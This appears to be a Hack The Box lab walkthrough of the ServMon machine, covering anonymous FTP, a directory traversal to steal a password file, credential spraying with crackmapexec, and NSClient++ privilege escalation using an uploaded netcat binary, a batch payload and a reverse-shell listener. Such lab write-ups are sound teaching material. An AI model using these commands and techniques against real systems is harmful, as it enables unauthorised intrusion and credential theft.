HTB Walkthrough ServMon

ServMon was released on the 11th of April and retired on the 20th of June. ServMon is an Easy-rated machine.


First we see that we have anonymous access to FTP. There is a file that mentions there should be a passwords.txt on Nathan's desktop. After the web enumeration we find a directory traversal, and we can use this vulnerability to get passwords.txt from Nathan's desktop.


After finding those passwords we still had to work out who they belong to; we used crackmapexec for this. It turns out we have credentials for Nadine. We were able to log in with SSH and read the user flag.


After some enumeration we found a program called NSClient++ on the machine. This is not a default application, and after some research it turns out this application is vulnerable in a way that gives system access.



nmap -sC -sV


Anonymous login:

Downloading the file:

The file says there should be a passwords.txt on Nathan's desktop.


NVMS-1000 is vulnerable to Directory Traversal

Since there was a hint on the FTP, we should be able to get passwords.txt from Nathan's desktop. We do this with Burp.




Now that we have some passwords, we still don't know where to use them or who they belong to.

From the FTP we know there should be two users, Nadine and Nathan, so I created a users.txt with these two. Let's try them in crackmapexec.

crackmapexec smb -u users.txt -p passwords.txt

Valid credentials found:


Now that we have valid credentials, we are able to log in with SSH.

ssh nadine@

Privilege Escalation

After some enumeration we see that NSClient++ is installed, which was also visible in the nmap scan. When we look at the following file we get some credentials. It also shows you cannot log in from the outside, only from localhost:

In the nmap scan we could see NSClient++ is running on port 8443:

When we log in with the password ew2x6SsGTxjRwXOT we get an error as expected, since this program only accepts requests from localhost.

Now we can exploit this program in two ways, through the API or the website. I decided to show you a combination of the two. For both we need to create an SSH tunnel so the machine thinks the request comes from localhost.

Exploit source:

Creating ssh tunnel:

ssh -L 4433: nadine@

Configure Firefox to use the SSH tunnel

Now we should be able to visit the page with

We should also be able to log in now:


The first step is:

Log in and enable the following modules, including enable at startup, and save the configuration:
- CheckExternalScripts
- Scheduler

But since these are already enabled we don't have to worry about that.

The next step is to create a batch file and upload the batch file and nc.exe (netcat).

In the shell I put the following commands:


cd c:\temp

python -m SimpleHTTPServer 80

wget -outfile nc.exe

wget -outfile secwalk.bat

Set up my listener:

nc -lvp 443

Now it is time to exploit

Earlier I said it's also possible to do this through the web page or through the API. I'm going to show you the combination of the two here:

curl -k -i -X PUT -u admin --data-binary @secwalk.bat

curl -k -s -H 'password: ew2x6SsGTxjRwXOT' ''

Now we are going to run secwalk from the web page.

And we receive our admin shell

Job Done

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
